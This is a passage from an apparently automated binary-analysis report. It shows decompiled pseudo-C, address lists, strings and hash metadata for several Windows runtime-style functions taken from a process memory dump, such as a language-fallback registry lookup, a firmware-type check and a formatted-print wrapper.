                                                                      								_t83 = _t74;
                                                                      								if(_t74 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L23;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      						while(1) {
                                                                      							L14:
                                                                      							_t27 =  &(_t94[1]); // 0x2
                                                                      							_t75 = _t27;
                                                                      							if(_t83 == 0x2c) {
                                                                      								break;
                                                                      							}
                                                                      							_t94 = _t75;
                                                                      							_t76 =  *_t94 & 0x0000ffff;
                                                                      							_t83 = _t76;
                                                                      							if(_t76 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L23;
                                                                      						}
                                                                      						 *_t94 = 0;
                                                                      						_t94 = _t75;
                                                                      						_t83 =  *_t75 & 0x0000ffff;
                                                                      						goto L19;
                                                                      					}
                                                                      				}
                                                                      			}































                                                                      0x013754de
                                                                      0x013754fb
                                                                      0x013754e0
                                                                      0x013754e6
                                                                      0x013754eb
                                                                      0x013754eb
                                                                      0x013754de
                                                                      0x00000000
                                                                      0x013754bc
                                                                      0x01375477
                                                                      0x0137547a
                                                                      0x01375480
                                                                      0x01375483
                                                                      0x01375486
                                                                      0x0137548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0137548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01375447
                                                                      0x01375447
                                                                      0x01375447
                                                                      0x01375447
                                                                      0x0137544e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01375450
                                                                      0x01375452
                                                                      0x01375455
                                                                      0x0137545a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0137545c
                                                                      0x0137546a
                                                                      0x0137546d
                                                                      0x0137546f
                                                                      0x00000000
                                                                      0x0137546f
                                                                      0x0131e70f

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0131E68C
                                                                      • @, xrefs: 0131E6C0
                                                                      • InstallLanguageFallback, xrefs: 0131E6DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1757540487
                                                                      • Opcode ID: c61199efec9d61d85edf8e8e2218b15619cffc784e8d7dd96ba90addc7477e9f
                                                                      • Instruction ID: 2cff3051d1834241ebd443f3c132109e0983905fff527f9cc1e9cd133f1e7fa1
                                                                      • Opcode Fuzzy Hash: c61199efec9d61d85edf8e8e2218b15619cffc784e8d7dd96ba90addc7477e9f
                                                                      • Instruction Fuzzy Hash: 6251B4766083469BD729DF68C440A7BB7E8BF8861CF05092EF985E7240FB75D904C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E013951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed short* _t63;
                                                                      				signed int _t64;
                                                                      				signed int _t65;
                                                                      				signed int _t67;
                                                                      				intOrPtr _t74;
                                                                      				intOrPtr _t84;
                                                                      				intOrPtr _t88;
                                                                      				intOrPtr _t94;
                                                                      				void* _t100;
                                                                      				void* _t103;
                                                                      				intOrPtr _t105;
                                                                      				signed int _t106;
                                                                      				short* _t108;
                                                                      				signed int _t110;
                                                                      				signed int _t113;
                                                                      				signed int* _t115;
                                                                      				signed short* _t117;
                                                                      				void* _t118;
                                                                      				void* _t119;
                                                                      
                                                                      				_push(0x80);
                                                                      				_push(0x13f05f0);
                                                                      				E0136D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                      				_t115 =  *(_t118 + 0xc);
                                                                      				 *(_t118 - 0x7c) = _t115;
                                                                      				 *((char*)(_t118 - 0x65)) = 0;
                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                      				_t113 = 0;
                                                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                      				_t100 = __ecx;
                                                                      				if(_t100 == 0) {
                                                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                      					E0132EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                      					 *((char*)(_t118 - 0x65)) = 1;
                                                                      					_t63 =  *(_t118 - 0x90);
                                                                      					_t101 = _t63[2];
                                                                      					_t64 =  *_t63 & 0x0000ffff;
                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                      					L20:
                                                                      					_t65 = _t64 >> 1;
                                                                      					L21:
                                                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                      					if(_t108 == 0) {
                                                                      						L27:
                                                                      						 *_t115 = _t65 + 1;
                                                                      						_t67 = 0xc0000023;
                                                                      						L28:
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                      						L29:
                                                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                      						E013953CA(0);
                                                                      						return E0136D130(0, _t113, _t115);
                                                                      					}
                                                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                      							 *_t108 = 0;
                                                                      						}
                                                                      						goto L27;
                                                                      					}
                                                                      					 *_t115 = _t65;
                                                                      					_t115 = _t65 + _t65;
                                                                      					E0135F3E0(_t108, _t101, _t115);
                                                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                      					_t67 = 0;
                                                                      					goto L28;
                                                                      				}
                                                                      				_t103 = _t100 - 1;
                                                                      				if(_t103 == 0) {
                                                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                      					_t74 = E01333690(1, _t117, 0x12f1810, _t118 - 0x74);
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                      					_t101 = _t117[2];
                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                      					if(_t74 < 0) {
                                                                      						_t64 =  *_t117 & 0x0000ffff;
                                                                      						_t115 =  *(_t118 - 0x7c);
                                                                      						goto L20;
                                                                      					}
                                                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                      					_t115 =  *(_t118 - 0x7c);
                                                                      					goto L21;
                                                                      				}
                                                                      				if(_t103 == 1) {
                                                                      					_t105 = 4;
                                                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                      					_push(_t118 - 0x70);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(_t105);
                                                                      					_push(_t118 - 0x78);
                                                                      					_push(0x6b);
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = E0135AA90();
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                      					_t113 = L01334620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                      					if(_t113 != 0) {
                                                                      						_push(_t118 - 0x70);
                                                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                      						_push(_t113);
                                                                      						_push(4);
                                                                      						_push(_t118 - 0x78);
                                                                      						_push(0x6b);
                                                                      						_t84 = E0135AA90();
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                      						if(_t84 < 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						_t110 = 0;
                                                                      						_t106 = 0;
                                                                      						while(1) {
                                                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                      							 *(_t118 - 0x88) = _t106;
                                                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                      								break;
                                                                      							}
                                                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                      							_t106 = _t106 + 1;
                                                                      						}
                                                                      						_t88 = E0139500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                      						_t119 = _t119 + 0x1c;
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                      						if(_t88 < 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						_t101 = _t118 - 0x3c;
                                                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                      						goto L21;
                                                                      					}
                                                                      					_t67 = 0xc0000017;
                                                                      					goto L28;
                                                                      				}
                                                                      				_push(0);
                                                                      				_push(0x20);
                                                                      				_push(_t118 - 0x60);
                                                                      				_push(0x5a);
                                                                      				_t94 = E01359860();
                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                      				if(_t94 < 0) {
                                                                      					goto L29;
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                      					_t101 = L"Legacy";
                                                                      					_push(6);
                                                                      				} else {
                                                                      					_t101 = L"UEFI";
                                                                      					_push(4);
                                                                      				}
                                                                      				_pop(_t65);
                                                                      				goto L21;
                                                                      			}























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: 5a4146915aff89b3b160b593872825675d299eb3f3c958659cf645893f4f2d5e
                                                                      • Instruction ID: dffa87b2aa08cf5152c68a2a7188718adeafeba4d60d55c2ca8e449ca91b4073
                                                                      • Opcode Fuzzy Hash: 5a4146915aff89b3b160b593872825675d299eb3f3c958659cf645893f4f2d5e
                                                                      • Instruction Fuzzy Hash: A0515E71A006099FDF26DFA8C990BADBBF8FF58708F14406EE649EB251D7719940CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E0131B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                      				signed int _t65;
                                                                      				signed short _t69;
                                                                      				intOrPtr _t70;
                                                                      				signed short _t85;
                                                                      				void* _t86;
                                                                      				signed short _t89;
                                                                      				signed short _t91;
                                                                      				intOrPtr _t92;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr* _t98;
                                                                      				signed short _t99;
                                                                      				signed short _t101;
                                                                      				void* _t102;
                                                                      				char* _t103;
                                                                      				signed short _t104;
                                                                      				intOrPtr* _t110;
                                                                      				void* _t111;
                                                                      				void* _t114;
                                                                      				intOrPtr* _t115;
                                                                      
                                                                      				_t109 = __esi;
                                                                      				_t108 = __edi;
                                                                      				_t106 = __edx;
                                                                      				_t95 = __ebx;
                                                                      				_push(0x90);
                                                                      				_push(0x13ef7a8);
                                                                      				E0136D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                      				if(__edx == 0xffffffff) {
                                                                      					L6:
                                                                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                      					__eflags = _t65 & 0x00000002;
                                                                      					if((_t65 & 0x00000002) != 0) {
                                                                      						L3:
                                                                      						L4:
                                                                      						return E0136D130(_t95, _t108, _t109);
                                                                      					}
                                                                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                      					_t108 = 0;
                                                                      					_t109 = 0;
                                                                      					_t95 = 0;
                                                                      					__eflags = 0;
                                                                      					while(1) {
                                                                      						__eflags = _t95 - 0x200;
                                                                      						if(_t95 >= 0x200) {
                                                                      							break;
                                                                      						}
                                                                      						E0135D000(0x80);
                                                                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                      						_t108 = _t115;
                                                                      						_t95 = _t95 - 0xffffff80;
                                                                      						_t17 = _t114 - 4;
                                                                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                      						__eflags =  *_t17;
                                                                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                      						_t102 = _t110 + 1;
                                                                      						do {
                                                                      							_t85 =  *_t110;
                                                                      							_t110 = _t110 + 1;
                                                                      							__eflags = _t85;
                                                                      						} while (_t85 != 0);
                                                                      						_t111 = _t110 - _t102;
                                                                      						_t21 = _t95 - 1; // -129
                                                                      						_t86 = _t21;
                                                                      						__eflags = _t111 - _t86;
                                                                      						if(_t111 > _t86) {
                                                                      							_t111 = _t86;
                                                                      						}
                                                                      						E0135F3E0(_t108, _t106, _t111);
                                                                      						_t115 = _t115 + 0xc;
                                                                      						_t103 = _t111 + _t108;
                                                                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                      						_t89 = _t95 - _t111;
                                                                      						__eflags = _t89;
                                                                      						_push(0);
                                                                      						if(_t89 == 0) {
                                                                      							L15:
                                                                      							_t109 = 0xc000000d;
                                                                      							goto L16;
                                                                      						} else {
                                                                      							__eflags = _t89 - 0x7fffffff;
                                                                      							if(_t89 <= 0x7fffffff) {
                                                                      								L16:
                                                                      								 *(_t114 - 0x94) = _t109;
                                                                      								__eflags = _t109;
                                                                      								if(_t109 < 0) {
                                                                      									__eflags = _t89;
                                                                      									if(_t89 != 0) {
                                                                      										 *_t103 = 0;
                                                                      									}
                                                                      									L26:
                                                                      									 *(_t114 - 0xa0) = _t109;
                                                                      									 *(_t114 - 4) = 0xfffffffe;
                                                                      									__eflags = _t109;
                                                                      									if(_t109 >= 0) {
                                                                      										L31:
                                                                      										_t98 = _t108;
                                                                      										_t39 = _t98 + 1; // 0x1
                                                                      										_t106 = _t39;
                                                                      										do {
                                                                      											_t69 =  *_t98;
                                                                      											_t98 = _t98 + 1;
                                                                      											__eflags = _t69;
                                                                      										} while (_t69 != 0);
                                                                      										_t99 = _t98 - _t106;
                                                                      										__eflags = _t99;
                                                                      										L34:
                                                                      										_t70 =  *[fs:0x30];
                                                                      										__eflags =  *((char*)(_t70 + 2));
                                                                      										if( *((char*)(_t70 + 2)) != 0) {
                                                                      											L40:
                                                                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                      											 *(_t114 - 4) = 1;
                                                                      											_push(_t114 - 0x74);
                                                                      											L0136DEF0(_t99, _t106);
                                                                      											 *(_t114 - 4) = 0xfffffffe;
                                                                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                      											goto L3;
                                                                      										}
                                                                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                      											goto L40;
                                                                      										}
                                                                      										_push( *((intOrPtr*)(_t114 + 8)));
                                                                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                      										_push(_t99 & 0x0000ffff);
                                                                      										_push(_t108);
                                                                      										_push(1);
                                                                      										_t101 = E0135B280();
                                                                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                      										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                      											__eflags = _t101 - 0x80000003;
                                                                      											if(_t101 == 0x80000003) {
                                                                      												E0135B7E0(1);
                                                                      												_t101 = 0;
                                                                      												__eflags = 0;
                                                                      											}
                                                                      										}
                                                                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                      										goto L4;
                                                                      									}
                                                                      									__eflags = _t109 - 0x80000005;
                                                                      									if(_t109 == 0x80000005) {
                                                                      										continue;
                                                                      									}
                                                                      									break;
                                                                      								}
                                                                      								 *(_t114 - 0x90) = 0;
                                                                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                      								_t91 = E0135E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                      								_t115 = _t115 + 0x10;
                                                                      								_t104 = _t91;
                                                                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                      								__eflags = _t104;
                                                                      								if(_t104 < 0) {
                                                                      									L21:
                                                                      									_t109 = 0x80000005;
                                                                      									 *(_t114 - 0x90) = 0x80000005;
                                                                      									L22:
                                                                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                      									L23:
                                                                      									 *(_t114 - 0x94) = _t109;
                                                                      									goto L26;
                                                                      								}
                                                                      								__eflags = _t104 - _t92;
                                                                      								if(__eflags > 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								if(__eflags == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L15;
                                                                      						}
                                                                      					}
                                                                      					__eflags = _t109;
                                                                      					if(_t109 >= 0) {
                                                                      						goto L31;
                                                                      					}
                                                                      					__eflags = _t109 - 0x80000005;
                                                                      					if(_t109 != 0x80000005) {
                                                                      						goto L31;
                                                                      					}
                                                                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                      					_t38 = _t95 - 1; // -129
                                                                      					_t99 = _t38;
                                                                      					goto L34;
                                                                      				}
                                                                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                      					__eflags = __edx - 0x65;
                                                                      					if(__edx != 0x65) {
                                                                      						goto L2;
                                                                      					}
                                                                      					goto L6;
                                                                      				}
                                                                      				L2:
                                                                      				_push( *((intOrPtr*)(_t114 + 8)));
                                                                      				_push(_t106);
                                                                      				if(E0135A890() != 0) {
                                                                      					goto L6;
                                                                      				}
                                                                      				goto L3;
                                                                      			}






















                                                                      0x013749a2
                                                                      0x013749a2
                                                                      0x013749a2
                                                                      0x01374999
                                                                      0x013749ac
                                                                      0x00000000
                                                                      0x013749b3
                                                                      0x013748f8
                                                                      0x013748fe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013748fe
                                                                      0x01374895
                                                                      0x0137489c
                                                                      0x013748ad
                                                                      0x013748b2
                                                                      0x013748b5
                                                                      0x013748b7
                                                                      0x013748ba
                                                                      0x013748bc
                                                                      0x013748c6
                                                                      0x013748c6
                                                                      0x013748cb
                                                                      0x013748d1
                                                                      0x013748d4
                                                                      0x013748d8
                                                                      0x013748d8
                                                                      0x00000000
                                                                      0x013748d8
                                                                      0x013748be
                                                                      0x013748c0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013748c2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013748c4
                                                                      0x00000000
                                                                      0x01374882
                                                                      0x0137487b
                                                                      0x01374904
                                                                      0x01374906
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01374908
                                                                      0x0137490e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01374910
                                                                      0x01374917
                                                                      0x01374917
                                                                      0x00000000
                                                                      0x01374917
                                                                      0x0131b1ba
                                                                      0x013747f9
                                                                      0x013747fc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013747fc
                                                                      0x0131b1c0
                                                                      0x0131b1c0
                                                                      0x0131b1c3
                                                                      0x0131b1cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _vswprintf_s
                                                                      • String ID:
                                                                      • API String ID: 677850445-0
                                                                      • Opcode ID: 0ecdce4a92ae74c52dc5d4844a6837709d4b0d4591cdd2d53154f7a769a3ee8e
                                                                      • Instruction ID: 1e07c44b1006534f464f9852190cff907a31c2e55031011978fab9a403b6023e
                                                                      • Opcode Fuzzy Hash: 0ecdce4a92ae74c52dc5d4844a6837709d4b0d4591cdd2d53154f7a769a3ee8e
                                                                      • Instruction Fuzzy Hash: 7451F171D002599FEB31CF68C844BAEBFB0BF05718F1041ADD859AB286D7796941CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E0133B944(signed int* __ecx, char __edx) {
                                                                      				signed int _v8;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				intOrPtr _v44;
                                                                      				signed int* _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				char _v77;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t68;
                                                                      				char* _t73;
                                                                      				intOrPtr _t77;
                                                                      				intOrPtr _t78;
                                                                      				signed int _t82;
                                                                      				intOrPtr _t83;
                                                                      				void* _t87;
                                                                      				char _t88;
                                                                      				intOrPtr* _t89;
                                                                      				intOrPtr _t91;
                                                                      				void* _t97;
                                                                      				intOrPtr _t100;
                                                                      				void* _t102;
                                                                      				void* _t107;
                                                                      				signed int _t108;
                                                                      				intOrPtr* _t112;
                                                                      				void* _t113;
                                                                      				intOrPtr* _t114;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t116;
                                                                      				intOrPtr _t117;
                                                                      				signed int _t118;
                                                                      				void* _t130;
                                                                      
                                                                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                      				_v8 =  *0x140d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                      				_t112 = __ecx;
                                                                      				_v77 = __edx;
                                                                      				_v48 = __ecx;
                                                                      				_v28 = 0;
                                                                      				_t5 = _t112 + 0xc; // 0x575651ff
                                                                      				_t105 =  *_t5;
                                                                      				_v20 = 0;
                                                                      				_v16 = 0;
                                                                      				if(_t105 == 0) {
                                                                      					_t50 = _t112 + 4; // 0x5de58b5b
                                                                      					_t60 =  *__ecx |  *_t50;
                                                                      					if(( *__ecx |  *_t50) != 0) {
                                                                      						 *__ecx = 0;
                                                                      						__ecx[1] = 0;
                                                                      						if(E01337D50() != 0) {
                                                                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                      						} else {
                                                                      							_t65 = 0x7ffe0386;
                                                                      						}
                                                                      						if( *_t65 != 0) {
                                                                      							E013E8CD6(_t112);
                                                                      						}
                                                                      						_push(0);
                                                                      						_t52 = _t112 + 0x10; // 0x778df98b
                                                                      						_push( *_t52);
                                                                      						_t60 = E01359E20();
                                                                      					}
                                                                      					L20:
                                                                      					_pop(_t107);
                                                                      					_pop(_t113);
                                                                      					_pop(_t87);
                                                                      					return E0135B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                      				}
                                                                      				_t8 = _t112 + 8; // 0x8b000cc2
                                                                      				_t67 =  *_t8;
                                                                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                      				_t108 =  *(_t67 + 0x14);
                                                                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                      				_t105 = 0x2710;
                                                                      				asm("sbb eax, edi");
                                                                      				_v44 = _t88;
                                                                      				_v52 = _t108;
                                                                      				_t60 = E0135CE00(_t97, _t68, 0x2710, 0);
                                                                      				_v56 = _t60;
                                                                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                      					L3:
                                                                      					 *(_t112 + 0x44) = _t60;
                                                                      					_t105 = _t60 * 0x2710 >> 0x20;
                                                                      					 *_t112 = _t88;
                                                                      					 *(_t112 + 4) = _t108;
                                                                      					_v20 = _t60 * 0x2710;
                                                                      					_v16 = _t60 * 0x2710 >> 0x20;
                                                                      					if(_v77 != 0) {
                                                                      						L16:
                                                                      						_v36 = _t88;
                                                                      						_v32 = _t108;
                                                                      						if(E01337D50() != 0) {
                                                                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                      						} else {
                                                                      							_t73 = 0x7ffe0386;
                                                                      						}
                                                                      						if( *_t73 != 0) {
                                                                      							_t105 = _v40;
                                                                      							E013E8F6A(_t112, _v40, _t88, _t108);
                                                                      						}
                                                                      						_push( &_v28);
                                                                      						_push(0);
                                                                      						_push( &_v36);
                                                                      						_t48 = _t112 + 0x10; // 0x778df98b
                                                                      						_push( *_t48);
                                                                      						_t60 = E0135AF60();
                                                                      						goto L20;
                                                                      					} else {
                                                                      						_t89 = 0x7ffe03b0;
                                                                      						do {
                                                                      							_t114 = 0x7ffe0010;
                                                                      							do {
                                                                      								_t77 =  *0x1408628; // 0x0
                                                                      								_v68 = _t77;
                                                                      								_t78 =  *0x140862c; // 0x0
                                                                      								_v64 = _t78;
                                                                      								_v72 =  *_t89;
                                                                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                      								while(1) {
                                                                      									_t105 =  *0x7ffe000c;
                                                                      									_t100 =  *0x7ffe0008;
                                                                      									if(_t105 ==  *_t114) {
                                                                      										goto L8;
                                                                      									}
                                                                      									asm("pause");
                                                                      								}
                                                                      								L8:
                                                                      								_t89 = 0x7ffe03b0;
                                                                      								_t115 =  *0x7ffe03b0;
                                                                      								_t82 =  *0x7FFE03B4;
                                                                      								_v60 = _t115;
                                                                      								_t114 = 0x7ffe0010;
                                                                      								_v56 = _t82;
                                                                      							} while (_v72 != _t115 || _v76 != _t82);
                                                                      							_t83 =  *0x1408628; // 0x0
                                                                      							_t116 =  *0x140862c; // 0x0
                                                                      							_v76 = _t116;
                                                                      							_t117 = _v68;
                                                                      						} while (_t117 != _t83 || _v64 != _v76);
                                                                      						asm("sbb edx, [esp+0x24]");
                                                                      						_t102 = _t100 - _v60 - _t117;
                                                                      						_t112 = _v48;
                                                                      						_t91 = _v44;
                                                                      						asm("sbb edx, eax");
                                                                      						_t130 = _t105 - _v52;
                                                                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                      							_t88 = _t102 - _t91;
                                                                      							asm("sbb edx, edi");
                                                                      							_t108 = _t105;
                                                                      						} else {
                                                                      							_t88 = 0;
                                                                      							_t108 = 0;
                                                                      						}
                                                                      						goto L16;
                                                                      					}
                                                                      				} else {
                                                                      					if( *(_t112 + 0x44) == _t60) {
                                                                      						goto L20;
                                                                      					}
                                                                      					goto L3;
                                                                      				}
                                                                      			}

                                                                      0x0133ba41
                                                                      0x0133ba46
                                                                      0x0133ba4c
                                                                      0x0133ba50
                                                                      0x0133ba54
                                                                      0x0133ba6a
                                                                      0x0133ba6e
                                                                      0x0133ba70
                                                                      0x0133ba74
                                                                      0x0133ba78
                                                                      0x0133ba7a
                                                                      0x0133ba7c
                                                                      0x0133ba8e
                                                                      0x0133ba90
                                                                      0x0133ba92
                                                                      0x0133bb14
                                                                      0x0133bb14
                                                                      0x0133bb16
                                                                      0x0133bb16
                                                                      0x00000000
                                                                      0x0133ba7c
                                                                      0x0133bb0a
                                                                      0x0133bb0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0133bb0f

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0133B9A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 885266447-0
                                                                      • Opcode ID: 6944b1367c73e60c0ae59689493409fadad35a7755b43cf107111ae6f82f1ad8
                                                                      • Instruction ID: 13e35216c607417ca8d87a383c2c44d056e2d0a6c01fac4dd8f4c5bbedafa8ae
                                                                      • Opcode Fuzzy Hash: 6944b1367c73e60c0ae59689493409fadad35a7755b43cf107111ae6f82f1ad8
                                                                      • Instruction Fuzzy Hash: 9C517871A08705CFD721CF2DC58092AFBE9FBC8618F14896EE98587359D730E844CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
